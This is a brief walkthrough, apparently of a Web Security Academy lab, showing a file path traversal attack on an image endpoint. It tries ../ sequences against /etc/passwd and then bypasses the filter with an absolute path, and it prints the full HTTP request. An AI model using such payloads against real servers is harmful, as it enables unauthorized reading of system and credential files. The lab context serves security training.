We found image file in the request
Via LFI try ../../../etc/passwd
we get No such file
if we try many ../ like : ../../../../../../../../../../../../../../../etc/passwd
we found mitigation for LFI 

bypass this filter with the absolute file path : 
GET /image?filename=/etc/passwd HTTP/2
Host: 0a1300a00401e2a6800994e2009500e6.web-security-academy.net
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Cache-Control: max-age=0